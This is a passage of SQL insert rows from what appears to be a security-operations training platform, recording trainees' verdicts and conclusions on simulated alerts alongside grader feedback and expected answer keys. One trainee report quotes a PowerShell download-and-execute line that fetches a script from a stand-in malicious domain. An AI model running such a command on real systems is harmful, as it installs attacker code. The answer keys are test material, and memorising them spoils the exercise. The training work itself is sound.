(47, 44, 166, 'investigating', NULL, NULL, NULL, NULL, '2025-12-28 00:05:00', '2025-12-27 21:00:00', '2025-12-27 21:00:00', 0, NULL),
(51, 54, 255, 'investigating', NULL, NULL, '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Insider Threat**.\\n\\n### Key Findings & Artifacts\\n- IP: 192.168.32.201\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nReset Credentials, Block IP / Domain, Isolate Host\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (192.168.32.201) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"IP\",\"value\":\"192.168.32.201\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Insider Threat\",\"action_taken\":[\"Reset Credentials\",\"Block IP / Domain\",\"Isolate Host\"]},\"submitted_at\":\"2026-01-03T16:55:43.995Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', NULL, '2025-12-29 21:35:43', '2026-01-31 21:00:01', 0, NULL),
(52, 54, 257, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is True Positive\\nDetection POWERSHELL-0012 correctly identified malicious activity, suspicious PowerShell execution and fileless malware pattern. Actions are warranted\",\"submitted_at\":\"2025-12-29T21:58:29.581Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Suspicious PowerShell execution with known malicious network communication.\",\"missed_items\":[\"Executive Summary\",\"Artifacts such as file hash and IP address\"],\"strengths\":\"Correctly identified the activity as malicious.\"}', NULL, '2025-12-29 21:46:51', '2026-01-02 02:40:31', 0, NULL),
(53, 54, 256, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"Alert is True Positive, its a known phishing URL, SEG saw the link is on a blacklist and quarantined the mail. The inbound e-mail bever reached the user\'s inbox. \",\"submitted_at\":\"2025-12-29T22:36:14.618Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The email contained a blacklisted URL linked to phishing, and the email was quarantined.\",\"missed_items\":[\"Actions Taken\",\"Analysis/Artifacts Found\",\"Headers\"],\"strengths\":\"Correctly identified the email as a phishing attempt and stated that it was quarantined.\"}', NULL, '2025-12-29 22:28:13', '2026-01-02 02:40:31', 0, NULL),
(59, 34, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-08T19:05:10.314Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: ip 203.0.113.45 (1/2). Missed response actions (3/4)\",\"missed_items\":[\"ip: 203.0.113.45\",\"escalate\"],\"strengths\":\"Needs improvement\"}', NULL, '2025-12-31 13:10:22', '2026-02-28 21:00:00', 0, NULL),
(60, 34, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"this is truepositive alert, end point has to isolate, block domain , hash etc. .\",\"submitted_at\":\"2025-12-31T14:34:55.159Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The execution of BlackEnergy malware, involvement of suspicious file and process, and the details such as file hash, IP addresses, and the user\'s action.\",\"missed_items\":[\"file_hash\",\"file_path\",\"internal_ip\",\"external_ip\",\"associated_action steps\"],\"strengths\":\"The analyst correctly identified the alert as a true positive.\"}', NULL, '2025-12-31 13:11:32', '2026-01-02 02:40:31', 0, NULL),
(65, 34, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2025-12-31 14:34:55', '2025-12-31 14:34:55', 0, NULL),
(67, 34, 304, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"It is truepositive alert. We need to block URL/Doamin and IP address and hash. \",\"submitted_at\":\"2026-01-02T04:31:15.901Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"},{\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"osint_verdict\":\"malicious\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-02 04:28:59', '2026-01-31 21:00:01', 0, NULL),
(68, 34, 305, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-02 04:31:15', '2026-01-02 04:31:15', 0, NULL),
(71, 34, 318, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-05T02:30:55.938Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-02 15:27:39', '2026-02-28 21:00:00', 0, NULL),
(81, 34, 274, 'investigating', NULL, NULL, NULL, NULL, '2026-01-03 00:42:46', '2026-01-02 21:34:46', '2026-01-02 21:34:46', 0, NULL),
(82, 54, 318, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\"],\"verdict\":\"false_positive\",\"conclusion\":\"Instigation confirmed benign activity on internal, known host \\\"internal-server\\\" (192.168.1.15). 15 failed login attempts to \\\"admin\\\" account on dst 192.168.1.100 were triggered by likely cause e.g., automated script misconfig, service account password expiry/rotation, or scheduled task with stale creds. No evidence of brute-force. Host verified clean via EDR scan/logs. Action taken (credential reset) was precautionary. No IOC\'s or anomalies post-review.\",\"submitted_at\":\"2026-01-03T17:06:09.611Z\"}', '{\"verdict\":\"False Positive\",\"recommended_actions\":[\"close_alert\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"192.168.1.15\",\"osint_verdict\":\"internal\"}]}', NULL, '2026-01-03 16:56:39', '2026-01-31 21:00:01', 0, NULL),
(83, 54, 315, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"Host compromised: WORKSTATION-01 (10.0.02) affected user: Jane.doe, Malware Identified: malware.exe-has b194 linked to known enterprise-targeting campaign. Rapid threat intelligence VirusTotal scan confirmed malicious hash. Risk level high. Immediate response actions host Isolation: WORKSTATION-01 quarantined from network-prevented lateral movement and data exfiltration. Malware Blocking: Malware hash globally blacklisted across all enterprise endpoints, Forensic Capture: Memory and disk imaging performed to preserve evidence. \",\"submitted_at\":\"2026-01-03T17:19:44.573Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-03 17:07:54', '2026-01-31 21:00:01', 0, NULL),
(84, 54, 249, 'investigating', NULL, NULL, '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Web Attack**.\\n\\n### Key Findings & Artifacts\\n- URL: http://maliciousdomain.com/script.ps1\\n- Command: \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\n- IP: 192.168.1.105\\n- Process: explorer.exe\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nIsolate Host, Block IP / Domain\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (http://maliciousdomain.com/script.ps1, \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\'), 192.168.1.105, explorer.exe) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"URL\",\"value\":\"http://maliciousdomain.com/script.ps1\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Command\",\"value\":\"\\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\",\"link\":\"\",\"score\":\"\"},{\"type\":\"IP\",\"value\":\"192.168.1.105\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Process\",\"value\":\"explorer.exe\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Web Attack\",\"action_taken\":[\"Isolate Host\",\"Block IP / Domain\"]},\"submitted_at\":\"2026-01-03T17:35:55.420Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', NULL, '2026-01-03 17:21:08', '2026-01-31 21:00:01', 0, NULL),
(86, 49, 428, 'investigating', NULL, NULL, NULL, NULL, '2026-01-05 01:39:51', '2026-01-04 22:30:51', '2026-01-04 22:30:51', 0, NULL),
(87, 1, 476, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-05 03:22:25', '2026-01-05 03:22:25', 0, NULL),
(88, 34, 496, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 03:35:33', '2026-01-06 00:29:33', '2026-01-06 00:29:33', 0, NULL),
(89, 34, 476, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is true positive. \",\"submitted_at\":\"2026-01-06T00:54:10.521Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"important_document.rtf\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-06 00:53:10', '2026-01-31 21:00:01', 0, NULL),
(90, 34, 477, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 00:54:10', '2026-01-06 00:54:10', 0, NULL),
(91, 1, 525, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 01:49:25', '2026-01-06 01:49:25', 0, NULL),
(92, 65, 244, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 10:10:49', '2026-01-06 07:00:49', '2026-01-06 07:00:49', 0, NULL),
(93, 1, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 19:45:51', '2026-01-06 19:45:51', 0, NULL),
(94, 68, 530, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-07T16:11:48.286Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.5\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"osint_verdict\":\"suspicious\"}]}', NULL, '2026-01-07 16:08:30', '2026-01-31 21:00:01', 0, NULL),
(95, 68, 531, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the Malicious payload, identifying key strengths in our response and critical areas needing improvement to address evolving threats like.\\nSuccessfully contained simulated ransomware, but identified gaps in endpoint detection coverage on 15% of legacy devices.\\nWhile no data was lost, potential downtime could have impacted critical operations.\\nRecommendations for improvement:  1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:40:25.941Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.15\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:11:48', '2026-01-31 21:00:01', 0, NULL),
(96, 68, 532, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the [Event Name], identifying key strengths in our response and critical areas needing improvement to address evolving threats like [Threat Type]\\\".\\nKey Findings: Backdoor was detected.\\nBusiness Impact: While no data was lost, potential downtime could have impacted critical operations.\\nRecommendations (POA&M): 1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:43:10.336Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"username\",\"value\":\"compromised_user\",\"osint_verdict\":\"suspicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:40:25', '2026-01-31 21:00:01', 0, NULL),
(97, 68, 533, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-07 16:43:10', '2026-01-07 16:43:10', 0, NULL),
(98, 34, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:35:26', '2026-01-11 01:35:26', 0, NULL),
(99, 34, 546, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:38:00', '2026-01-11 01:38:00', 0, NULL),
(100, 34, 345, 'investigating', NULL, NULL, NULL, NULL, '2026-01-11 04:54:19', '2026-01-11 01:45:19', '2026-01-11 01:45:19', 0, NULL),
(147, 78, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-14 03:22:08', '2026-01-14 03:22:08', 0, NULL),
(148, 74, 642, 'investigating', NULL, NULL, NULL, NULL, '2026-01-14 09:40:24', '2026-01-14 06:35:24', '2026-01-14 06:35:24', 0, NULL),
(149, 74, 830, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-14 06:36:01', '2026-01-14 06:36:01', 0, NULL),
(150, 74, 236, 'investigating', NULL, NULL, NULL, NULL, '2026-01-14 09:44:57', '2026-01-14 06:38:57', '2026-01-14 06:38:57', 0, NULL),
(151, 74, 601, 'investigating', NULL, NULL, NULL, NULL, '2026-01-14 09:48:23', '2026-01-14 06:40:23', '2026-01-14 06:40:23', 0, NULL),
(152, 85, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-16 13:33:40', '2026-01-16 13:33:40', 0, NULL),
(153, 85, 952, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"Dest ip: 192.168.1.50\\nSource ip: 203.0.113.55\\nhostname: server01\\ndomain : maliciousc2.com\\n\\nThe ip and domain belong to C2C server and they are blocked. \\n\\nIt is important to analyse deeper to verify, if the connection is successful.\\n\",\"submitted_at\":\"2026-01-16T13:40:01.913Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (1/3)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-16 13:35:06', '2026-01-31 21:00:01', 0, NULL),
(154, 85, 727, 'investigating', NULL, NULL, NULL, NULL, '2026-01-16 16:45:24', '2026-01-16 13:40:24', '2026-01-16 13:40:24', 0, NULL),
(155, 54, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"Email abc123@example.com was reported Suspicious with Unusual email activity detected.\\nIP 203.0.113.45 was reported as Malicious the IP is associated with known phishing campaigns.\\nHash 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a was reported Malicious there was Malware detected in attachment.\\nContainment protocol consist of isolating host, block IP/Domain, block file hash, reset credentials, and collect forensics.\\nVerdict is True positive\",\"submitted_at\":\"2026-01-17T03:11:31.821Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (3/4)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 03:00:58', '2026-01-31 21:00:01', 0, NULL),
(156, 54, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"October 5, 2023, EDR system alerted to a confirmed BlackEnergy malware execution on the host CORP-ENDPOINT-23 (user:jdoe). The infection originated from malicious phishing attachment (invoice.doc).\\nKey findings:\\nSource: Malicious file invoice.doc delivered via email\\nInfected Host: Internal IP 192.168.1.45\\nCommand & Control: Communication with a known malicious external IP (203.0.113.50) associated with BlackEnergy campaigns.\\nIOC Match: File hash and malware signature confirmed against threat intelligence database.\\nActions taken were to isolate the host, block IP/Domain, block file hash, reset credentials, and to collect forensics. The incident was classified as a True Positive with high severity level.\\n\\n\",\"submitted_at\":\"2026-01-17T03:30:03.780Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 03:11:31', '2026-01-31 21:00:01', 0, NULL),
(157, 54, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-17 03:30:03', '2026-01-17 03:30:03', 0, NULL),
(158, 74, 950, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Malicious link in phidhing email\",\"submitted_at\":\"2026-01-17T08:45:12.141Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 08:43:36', '2026-01-31 21:00:01', 0, NULL),
(159, 74, 991, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-17T08:47:53.790Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/3). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 08:46:40', '2026-01-31 21:00:01', 0, NULL),
(160, 74, 992, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-17T08:49:00.518Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/3). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 08:47:53', '2026-01-31 21:00:01', 0, NULL),
(161, 74, 993, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-17 08:49:00', '2026-01-17 08:49:00', 0, NULL),
(162, 52, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-19 08:45:34', '2026-01-19 08:45:34', 0, NULL),
(163, 52, 707, 'investigating', NULL, NULL, NULL, '{\"verdict_correctness\":\"Incorrect\",\"key_findings\":\"Incorrect verdict. Expected true_positive, got benign. Missed critical artifacts (0/1). Missed response actions (2/3)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-19 08:46:26', '2026-01-19 08:57:52', 0, NULL),
(164, 91, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-20 10:38:53', '2026-01-20 10:38:53', 0, NULL),
(165, 93, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"An email from abc123@example.com which is detected for unusual activity sent to employee@corporate.com which had an malware attachment named urgent_document and the subject was urgent warning , when an email is sent as urgently it has higher chances to be phishing \\nemail was sent from external IP - 203.0.113.45 which is known for phishing campaigns.\",\"submitted_at\":\"2026-01-20T21:20:08.170Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (3/4)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 20:57:32', '2026-01-31 21:00:01', 0, NULL),
(166, 93, 728, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"A malicious IP from outside tried to bruteforce the internal network server. Malicious IP was reported 174 times for bruteforce earlier.\",\"submitted_at\":\"2026-01-20T21:01:30.744Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/1). Missed response actions (2/3)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 20:57:43', '2026-01-31 21:00:01', 0, NULL),
(167, 93, 283, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"An external IP 203.0.113.45 tried to access an internal IP 192.168.1.10 and it was too much failure attemps , so they didnt success to connect and find the password.\",\"submitted_at\":\"2026-01-20T21:08:02.426Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 21:02:24', '2026-01-31 21:00:01', 0, NULL),
(168, 93, 948, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"An external IP - 203.0.113.45 whish is reported 847 times as malicious did bruteforce to the internal user of the organization jdoe with ip - 192.168.1.10 / workstation01- and had 35 failed attempts.\",\"submitted_at\":\"2026-01-20T21:13:10.766Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/1). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 21:08:22', '2026-01-31 21:00:01', 0, NULL),
(169, 93, 269, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-20 21:20:08', '2026-01-20 21:20:08', 0, NULL),
(170, 94, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-21 01:57:29', '2026-01-21 01:57:29', 0, NULL),
(171, 95, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"artefatos maliciosos detectados\",\"submitted_at\":\"2026-01-21T18:59:04.089Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (3/4)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 17:18:27', '2026-01-31 21:00:01', 0, NULL),
(172, 95, 761, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"test de analise.\",\"submitted_at\":\"2026-01-21T18:41:12.896Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 18:36:11', '2026-01-31 21:00:01', 0, NULL),
(173, 95, 625, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"test\",\"submitted_at\":\"2026-01-21T18:44:05.291Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/1). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 18:42:03', '2026-01-31 21:00:01', 0, NULL),
